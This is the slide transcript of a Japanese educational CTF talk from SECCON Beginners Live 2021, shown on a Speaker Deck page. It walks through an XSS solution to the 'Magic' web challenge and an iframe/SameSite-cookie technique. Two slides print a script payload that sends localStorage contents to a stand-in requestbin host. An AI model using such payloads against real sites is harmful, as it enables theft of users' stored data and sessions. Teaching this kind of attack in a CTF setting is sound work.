Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
Search
Hi120ki
October 17, 2021
Technology
0
1k
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/
Hi120ki
October 17, 2021
Tweet
Share
More Decks by Hi120ki
See All by Hi120ki
SECCON13 - SECCON Beginners Workshop - Reversing
hi120ki
0
68
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.4k
Other Decks in Technology
See All in Technology
20250307_エンジニアじゃないけどAzureはじめてみた
ponponmikankan
2
150
What's new in Go 1.24?
ciarana
1
120
Exadata Database Service on Cloud@Customer セキュリティ、ネットワーク、および管理について
oracle4engineer
PRO
2
1.6k
事業モメンタムを生み出すプロダクト開発
macchiitaka
0
110
AWSではじめる Web APIテスト実践ガイド / A practical guide to testing Web APIs on AWS
yokawasa
8
780
開発組織を進化させる!AWSで実践するチームトポロジー
iwamot
2
540
2025/3/1 公共交通オープンデータデイ2025
morohoshi
0
110
30→150人のエンジニア組織拡大に伴うアジャイル文化を醸成する役割と取り組みの変化
nagata03
0
350
Qiita Organizationを導入したら、アウトプッターが爆増して会社がちょっと有名になった件
minorun365
PRO
1
320
【Forkwell】「正しく」失敗できるチームを作る──現場のリーダーのための恐怖と不安を乗り越える技術 - FL#83 / A team that can fail correctly by forkwell
i35_267
1
100
EMConf JP 2025 懇親会LT / EMConf JP 2025 social gathering
sugamasao
2
210
AI Agent時代なのでAWSのLLMs.txtが欲しい!
watany
3
370
Featured
See All Featured
Git: the NoSQL Database
bkeepers
PRO
428
65k
Side Projects
sachag
452
42k
Fontdeck: Realign not Redesign
paulrobertlloyd
83
5.4k
A designer walks into a library…
pauljervisheath
205
24k
Code Reviewing Like a Champion
maltzj
521
39k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
40
2k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
227
22k
Embracing the Ebb and Flow
colly
84
4.6k
Measuring & Analyzing Core Web Vitals
bluesmoon
6
260
Writing Fast Ruby
sferik
628
61k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
100
18k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
47
5.2k
Transcript
Magic Web SECCON Beginners Live 2021 hi120ki
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :
firmware Web : json, magic
Web Magic 3
Magic [Web Hard] : 31solve Web 5 • • 4
5 /
6 /
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
8 / URL
9 /
10 crawler/index.js puppeteer Node.js Chrome URL
11 2. FLAG 3. URL crawler/index.js 1.
12 FLAG nginx/html/static/index.js FLAG
13 FLAG JavaScript XSS( )
XSS 14 HTML Web HTML JavaScript Cookie Web
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>
17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????
18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL
XSS 19 magic/views/index.ejs <script> </script>
20 alert(1)
21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>
22 FLAG URL
23 XSS https://magic.quals.beginners.seccon.jp/
24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
25 ... + = ? XSS
26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
28 URL
29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS
30 FLAG 1. FLAG 2. 3.
31
1. XSS 2. 3. 32
1. XSS 2. 3. 33 FLAG
1. XSS 2. 3. 34
1. XSS 2. 3. 35
36 FLAG
XSS • • Byte Bandits CTF 2020 Notes App •
https://github.com/ByteBandits/bbctf-2020 37
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •
FLAG iframe • • API
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL
iframe
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS
FLAG
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)
<script>...</script>
43 iframe SameSite Cookie None Lax
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)
FLAG
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)
FLAG
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie
(session=nj49gn...) ✕ FLAG <script>...</script>
47 SameSite Cookie=None iframe CTF
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (
XSS Content-Security-Policy )
49 FLAG +
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup
https://hi120ki.github.io/blog/posts/20210523-3/